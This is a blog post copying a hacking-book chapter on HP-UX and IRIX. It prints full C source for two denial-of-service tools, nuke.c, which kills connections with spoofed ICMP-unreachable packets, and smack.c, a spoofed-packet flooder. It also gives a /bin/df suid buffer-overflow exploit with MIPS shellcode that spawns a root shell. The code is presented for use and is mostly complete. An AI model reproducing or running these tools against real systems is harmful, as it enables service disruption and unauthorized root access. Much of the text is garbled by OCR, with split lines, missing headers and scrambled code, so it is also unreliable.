Sunday, December 6, 2009

HP/UX

For many corporate UNIX infrastructures, Hewlett-Packard's HP-UX operating system (www.unixsolutions.hp.com) serves as an excellent foundation for mission-critical applications over the Internet. In fact, HP/UX is the leading platform for the top three database suites: Oracle, Informix, and Sybase. Since the release of version HP-UX boasts 11 competitive features:

64-bit power. Runs larger applications, and processes large data sets faster.

Industry's leading performance. Achieved via V-Class and N-Class servers.

Broadest application portfolio. Cost-effectively delivers leading packaged application software.

Easy upgrades. Enables unmodified use of 9.x or 10.x applications (also runs 32-bit and 64­bit side by side).

Widely supported. Is compatible with the full line of HP 9000 Enterprise servers.

Superior scalability. Simplifies the move from 1- to 128-way computing within the same system.

Improved resilience. Maximizes uptime.

Top security. Secures applications ranging from communications to business transactions.

Ready for e-services. Supports HP's Internet e-commerce strategy.

Ready for IA-64. Binary compatibility smoothes transition to the next-generation IA-64 architecture.

• Promising future. Backed by the resources and expertise of HP. Liabilities

Denial-of-Service Attack

Synopsis: DoS attack that can potentially terminate an IP connection.



Hack State: Severe congestion.



Vulnerabilities: All flavors.



Breach: Nuke.c, by renown super hacker Satanic Mechanic, is a DoS attack that can kill almost any IP connection using ICMP-unreachable messages.



Nuke.c



#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#define DEFAULT_UNREACH ICMP_UNREACH_PORT

char *icmp_unreach_type[] = { "net",~

"host",

"protocol", "port", "frag", "source", "destnet", "desthost", "isolated", "authnet",

"authhost",

"netsvc", "hostsvc"

};



#define MAX_ICMP_UNREACH (sizeof(icmp_unreach_type)/sizeof(char *))



int resolve_unreach_type(arg) char *arg;



{

int i;



for (i=0; i
if (!strcmp(arg,icmp_unreach_type[i])) return i;

return -1;





int resolve_host (host,sa) char *host;

struct sockaddr_in *sa;

{

struct hostent *ent ;



bzero(sa,sizeof(struct sockaddr)); sa->sin_family = AF_INET; if (inet_addr(host) == -1) { ent = gethostbyname(host); if (ent != NULL) {

sa->sin_family = ent->h_addrtype; bcopy(ent->h_addr,(caddr_t)&sa->sin_addr,ent-

>h_length);

return(0);

}

else {

fprintf(stderr,"error: unknown host %s\n",host); return(-1);

}

}

return(0);

}

in_cksum(addr, len) /* from ping.c */

u_short *addr; int len;

{

register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0;



/*

Our algorithm is simple, using a 32­bit accumulator (sum),

we add sequential 16­bit words to it, and at the end, fold

back all the carry bits from the top 16 bits into the l

ower

16 bits.

*/

while( nleft > 1 ) {

sum += *w++;

nleft -= 2;



}



/* mop up an odd byte, if necessary */

if( nleft == 1 ) {

*(u_char *)(&answer) = *(u_char *)w ;

sum += answer;







* add back carry outs from top 16 bits to low 16 bits

*/

sum = (sum >> 16) + (sum & Oxffff); /* add hi 16 to low 1



sum += (sum >> 16); answer = ~sum;



return (answer);

/* add carry */

/* truncate to 16 bit

int icmp_unreach(host,uhost,port,type) char *host,*uhost; int type,port;

{

struct sockaddr_in name;

struct sockaddr dest,uspoof;

struct icmp *mp;

struct tcphdr *tp;

struct protoent *proto;



int i,s,rc;

char *buf = (char *) malloc(sizeof(struct icmp)+64); mp = (struct icmp *) buf;

if (resolve_host(host,&dest) <0) return(-1); if (resolve_host(uhost,&uspoof) <0) return(-1); if ((proto = getprotobyname("icmp")) == NULL) {

fputs("unable to determine protocol number of \"icmp\n",std

err);

return(-1);

}

if ((s = socket(AF_INET,SOCK_RAW,proto->p_proto)) <0 ) { perror("opening raw socket"); return(-1);

}



/* Assign it to a port */ name.sin_family = AF_INET; name.sin_addr.s_addr = INADDR_ANY; name.sin_port = htons(port);



/* Bind it to the port */

rc = bind(s, (struct sockaddr *) & name, sizeof(name));

if (rc == -1) {

perror("bind");



return(-1);

}



if ((proto = getprotobyname("tcp")) == NULL) {

fputs("unable to determine protocol number of \"icmp\n",std

err);

return(-1);

}



/* the following messy stuff from Adam Glass (icmpsquish.c) */

bzero(mp,sizeof(struct icmp)+64);

mp->icmp_type = ICMP_UNREACH;

mp->icmp_code = type;

mp->icmp_ip.ip_v = IPVERSION;

mp->icmp_ip.ip_hl = 5;

mp->icmp_ip.ip_len = htons(sizeof(struct ip)+64+20); mp->icmp_ip.ip_p = IPPROTO_TCP;

mp->icmp_ip.ip_src = ((struct sockaddr_in *) &dest)->sin_addr; mp->icmp_ip.ip_dst = ((struct sockaddr_in *) &uspoof)->sin_addr;

mp->icmp_ip.ip_ttl = 179; mp->icmp_cksum = 0;

tp = (struct tcphdr *) ((char *) &mp->icmp_ip+sizeof(struct ip)); tp->th_sport = 23; tp->th_dport = htons(port);

tp->th_seq = htonl(0x275624F2);

mp->icmp_cksum = htons(in_cksum(mp,sizeof(struct icmp)+64)); if ((i= sendto(s,buf,sizeof(struct icmp)+64, 0,&dest,sizeof(des

t))) <0 ) {

perror("sending icmp packet"); return(-1);

}

return(0);

}



void main(argc,argv) int argc; char **argv;

{

int i, type;



if ((argc <4) || (argc >5)) {

fprintf(stderr,"usage: nuke host uhost port [unreach_type]\

n");

exit(1);

}



if (argc == 4) type = DEFAULT_UNREACH;

else type = resolve_unreach_type(argv[4]);



if ((type <0) ||(type >MAX_ICMP_UNREACH)) {

fputs("invalid unreachable type",stderr); exit(1);

if (icmp_unreach(argv[1],argv[2],atoi(argv[3]),type) <0) exit(1

);

exit(0);

}



Denial-of-Service Attack



Synopsis: As explained earlier in this chapter, smack.c is a DoS attack that sends random ICMP-unreachable packets from customized random IP addresses.



Vulnerabilities: All.



Breach: This DoS attack was designed as a connection-killer because the victim receives an abundance of packets from the addresses inserted between the */ Insert and End sections.



smack.c



*/

#include #include #include #include #include #include #include #include #include #include #include #include

char conn_pack0[] = { -128, 0, 0, 12, 1, 81, 85, 65, 75, 69, 0, 3 }; char conn_pack1[] = { -1,-1,-1, -

1,99,111,110,110,101,99,116,32,34,92,110,111,

101,92,50,53,48,48,92,98,111,116,116,111,109 108,111,114,92,49,98,92,116,111,112,99,111,1 92,110,97,109,101,92,83,110,111,111,112,121,

97,105,109,92,48,92,109,115,103,92,49,92,114

,97,116,

,99,111, 08,111,114,

34,10 };

#define PS0 20+8+12

#define PS1 20+8+strlen(conn_pack1)

char *servers[] = {



*/ Insert addresses here



"xxx.xxx.xxx.xxx:26000:0", "xxx.xxx.xxx.xxx:26000:0", "xxx.xxx.xxx.xxx:26000:0",



End /* int i, s, fl, ret; unsigned int sp, dp; struct in_addr src, dst; struct sockaddr_in addr; char pack[1024]; struct ip *iph; struct udphdr *udph; int read_data(void); int parse_in(char *);

int addserv(char *, unsigned int, char);

void main(int argc, char *argv[])

{

iph = (struct ip *)pack;

udph = (struct udphdr *)(iph + 1);

if (argc < 2) {

printf("Usage: ./smack \n", argv[0]);

exit(-1);

}

printf("Slinging Packets \n");

src.s_addr = inet_addr(argv[1]); if (src.s_addr == -1) {

printf("Invalid source IP: %s\n", argv[1]);

exit(-1);

}

s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);

if (s == -1) {

perror("socket"); exit(-1);

}

fl = 1;

ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, &fl, sizeof(int));

if (ret == -1) {

perror("setsockopt"); exit(-1);

}

bzero((char *)&addr, sizeof(addr)); addr.sin_family = AF_INET; read_data(); printf("UnFed.\n");

}

int parse_in(char *in)

{

int i, n, c, m, ret;

char ip[16], tmp[6], mode, tmp2;

unsigned int port;

bzero(ip, 16); bzero(tmp, 6); mode = 0; port = 0; n = 0; c = 0; m = 0; tmp2 = 0;

for (i = 0; i < strlen(in); i++) { if (in[i] != ' ') { if (in[i] != ':') {

if (m == 0) { ip[c] = in[i]; c++;

}

if (m == 1) {

tmp[c] = in[i]; c++;

}

) {

if (m == 2

tmp2 = in[i]; break;

}

}

else {

m++; c = 0;

}

}

}

port = (unsigned int)atoi(tmp); mode = (tmp2 - 48); addserv(ip, port, mode); return ret;

}

int read_data(void)

{

int i;

char in[1024];

for (i = 0; i < 32767; { if (servers[i] == NULL)

break; parse_in(servers[i]);

}

return 1;

}

int addserv(char *ip, unsigned int port, char mode)

{

bzero(pack, 1024); dp = port;

iph->ip_v = IPVERSION; iph->ip_hl = sizeof *iph >> 2; iph->ip_tos = 0;

iph->ip_ttl = 40;

#ifdef BSD

if (mode == 0)

iph->ip_len = PS0; else

iph->ip_len = PS1;

#else

if (mode == 0)

iph->ip_len = htons(PS0);



else

iph->ip_len = htons(PS1);

iph->ip_p = IPPROTO_UDP; iph->ip_src = src; dst.s_addr = inet_addr(ip); if (dst.s_addr == -1) {

printf("Invalid destination IP: %s\n", ip);

}

addr.sin_port = htons(port); addr.sin_addr.s_addr = dst.s_addr; iph->ip_dst = dst;

#ifdef BSD

udph->uh_dport = htons(dp);

htons(sizeof *udph + 12); htons(rand());

if (mode == 0) {

udph->uh_ulen udph->uh_sport

}

htons(sizeof *udph + strlen(conn_pack1));

htons(27001);

else {

udph->uh_ulen udph->uh_sport

}

htons(dp);

{

htons(sizeof *udph + 12); htons(rand());

#else

udph->dest if (mode == 0)

udph->len =

}

else {

udph->len = udph->source

}





htons(sizeof *udph

= htons(27001);





#endif

if

conn_pack0, 12); pack, PS0, 0, (struct

sockaddr *)&addr,

(mode == 0) { memcpy(udph + 1 ret = sendto(s, sizeof(addr)); }

else {

memcpy(udph + 1, conn_pack1, strlen(conn_pack1)); ret = sendto(s, pack, PS1, 0, (struct sockaddr *)&addr, size of(addr)); }

if (ret == -1) {

perror("sendto"); exit( -1);

}

}



To fully recognize the threat level of smack.c, further examination of its functionality is in order. Earlier in this book, flooding techniques, such as the infamous smurf attack, were described. To summarize, the smurf attack is when an attacker spoofs the source field of ICMP echo packets (with a target address), and sends them to a broadcast address. The result is usually disastrous, as the target receives replies from all sorts of interfaces on the local segment.



The Internet Control Message Protocol (ICMP) sends message packets, reporting errors, and other pertinent information back to the sending station or source. This mechanism is implemented by hosts and infrastructure equipment to communicate control and error information, as they pertain to IP packet processing. ICMP message encapsulation is a twofold process: The messages are encapsulated in IP datagrams, which are encapsulated in frames, as they travel across the Internet. Basically, ICMP uses the same unreliable means of communications as a datagram. Therefore, ICMP error messages may be lost or duplicated. Table 10.1 lists and describes the various ICMP message types.



In the case of Type 3, Destination unreachable, there are several instances when this message type is issued, including: when a router or gateway does not know how to reach the destination, when a protocol or application is not active, when a datagram specifies an unstable route, or when a router must fragment the size of a datagram and cannot because the Don't Fragment flag is set. An example of a Type 3 message might be:

Step 1: Begin Echo Request

Ping 206.0.125.81 (at the command prompt) Step 2: Begin Echo Reply

Pinging 206.0.125.81 with 32 bytes of data:

Destination host unreachable. Destination host unreachable. Destination host unreachable.



The broadcast address is defined as the system that copies and delivers a single packet to all addresses on the network. All hosts attached to a network can be notified by sending a packet to a common address known as the broadcast address. Depending on the size of the imposed ''smurfed" subnet, the number of replies to the victim could be in the thousands. In addition, as a bonus to the attacker, severe congestion would befall this segment.



The so-called smack attack inherits similar functionality as the smurf, save for the victim receiving responses from randomly specified addresses. These addresses are input between the following lines of code in smack.c:



*/ Insert addresses here



"xxx.xxx.xxx.xxx:26000:0", "xxx.xxx.xxx.xxx:26000:0", "xxx.xxx.xxx.xxx:26000:0",



End /*



To the victim, the result appears to be a flooding of random ICMP Type 3 messages, as shown in Figure 10.3.



IRIX



In 1982, Silicon Graphics, Inc. (SGI) released a new flavor of the industry standard UNIX called IRIX (www.sgi.com/developers/technology/irix). Over the years, IRIX has enabled SGI to deliver generations of leading-edge, high-performance computing, advanced graphics, and visual computing platforms. IRIX is known as the first commercial UNIX operating system to support symmetric multiprocessing (SMP) and complete 64-bit and 32-bit environments. IRIX is compliant with UNIX System V, Release 4, and the Open Group's many standards, including UNIX 95, Year 2000, and POSIX.tures. IRIX setup, configuration, administration, and licensing are now a cinch with user-friendly pop-up graphic GUI windows.



For example, License Manager (shown in Figure 10.4) is a graphical tool that can be accessed from the system tool chest. Whenever a user installs,

updates or removes a license, License Manager restarts or stops the local License Manager daemon to put the user's change into effect.

Denial-of-Service Attack

Synopsis: By sending a specific RPC packet to the fcagent daemon, the FibreVault configuration and status monitor can be rendered inoperable.

Hack State: System crash.



Vulnerabilities: IRIX 6.4, 6.5.



Breach: IRIX's fcagent daemon is an RPC-based daemon that services requests about status or configuration of a FibreVault enclosure (a very fast fiber optics installation of Disks). Fcagent is vulnerable to a remote DoS attack that could cause the FibreVault to stop responding, making the IRIX's Disk array inaccessible. By sending a specific RPC packet to the fcagent daemon, the FibreVault configuration and status monitor can be made inoperable. This causes all the disks inside the FibreVault to stop responding, potentially resulting in a system halt.



Root Access



Synopsis: There is a buffer overflow in/bin/df (installed suid root), and for this reason root access is achievable for hackers.



Hack State: Unauthorized root access.



Vulnerabilities: IRIX 5.3, 6.2, and 6.3.



Breach: Compiles with either gcc or cc, and specifies -mips3, -mips4, or -n32 on an O2. The default compilation options result in a binary that causes cache coherency problems.











#define BUF_LENGTH

#define EXTRA

#define OFFSET

#define IRIX_NOP

1504

700 0x200

0x03e0f825



#define u_long unsigned



u_long get_sp_code[] = {

0x03a01025, /* move $v0,$sp */

0x03e00008, /* jr $ra */



0x00000000, /* nop */

} ;



u_long irix_


shellcode[]


= {




0x24041234,"


/*


li $4,0x1234


*/

0x2084edcc,


/*


sub $4,0x1234


*/

0x0491fffe,


/*


bgezal $4,pc-4


*/

0x03bd302a,


/*


sgt $6,$sp,$sp


*/

0x23e4012c,


/*


addi $4,$31,264+36


*/

0xa086feff,


/*


sb $6,-264 + 7($4)


*/

0x2084fef8,


/*


sub $4,264


*/

0x20850110,


/*


addi $5,$4,264+8


*/

0xaca4fef8, 0xaca6fefc, 0x20a5fef8, 0x240203f3, 0x03ffffcc, 0x2f62696e,

0x2f7368ff, };

sw $4,-264($5) sw $4,-260($5) sub $5, 264 li $v0,1011

syscall 0xfffff

"/bin"

"/sh"

char buf[BUF_LENGTH + EXTRA + 8]; void main(int argc, char **argv)

{

char *env[] = {NULL} ; u_long targ_addr, stack; u_long *long_p;

int i, code_length = strlen((char *)irix_shellcode)+1; u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;



stack = get_sp();



long_p =(u_long *) buf; targ_addr = stack + OFFSET;



if (argc > 1) targ_addr += atoi(argv[1]) * 4;



while ((targ_addr & 0xff000000) == 0 || (targ_addr & 0x00ff0000) == 0 ||

(targ_addr & 0x0000ff00) == 0 || (targ_addr & 0x000000ff) == 0)

targ_addr += 4;



for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = IRIX_NOP;



for (i = 0; i < code_length/sizeof(u_long); i++)

*long_p++



for (i = 0; i < EXTRA / sizeof(u_long); i++)

*long_p++ = (targ_addr << 16) | (targ_addr >> 16); *long_p = 0;



printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr);



execle("/bin/df", "df", &buf[3], 0, env); perror("execl failed");

}

No comments:

Post a Comment